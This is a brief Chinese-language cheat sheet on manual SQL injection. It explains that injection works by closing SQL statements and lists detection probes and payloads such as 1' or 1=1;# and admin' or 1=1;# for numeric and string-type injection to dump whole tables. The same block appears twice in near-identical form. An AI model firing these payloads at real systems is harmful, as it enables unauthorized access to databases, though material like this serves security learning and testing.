手工SQL注入:
原理:依靠創造SQL語句的閉合來獲取數據庫的數據
1、數字型
(1)判斷注入
1‘
1 and 1=1
1 and 1=2
(2)注入過程
1' or 1=1;# 獲取表中所有數據
2.字符型
(1)判斷注入
admin’ and ‘1’=1–’
admin’ and ‘1=2–’
(2)注入過程
admin' or 1=1;# 獲取表中所有數據
原理:依靠創造SQL語句的閉合來獲取數據庫的數據
(1)判斷注入
1‘
1 and 1=1
1 and 1=2
(2)注入過程
1' or 1=1;# 獲取表中所有數據
(1)判斷注入
admin’ and ‘1’=1–’
admin’ and ‘1=2–’
(2)注入過程
admin' or 1=1;# 獲取表中所有數據